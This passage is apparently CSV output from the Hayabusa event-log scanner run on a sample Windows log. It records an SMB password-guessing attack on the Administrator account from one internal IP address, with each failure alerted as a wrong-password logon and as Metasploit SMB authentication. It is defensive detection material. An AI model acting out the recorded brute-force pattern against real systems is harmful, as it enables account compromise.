NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
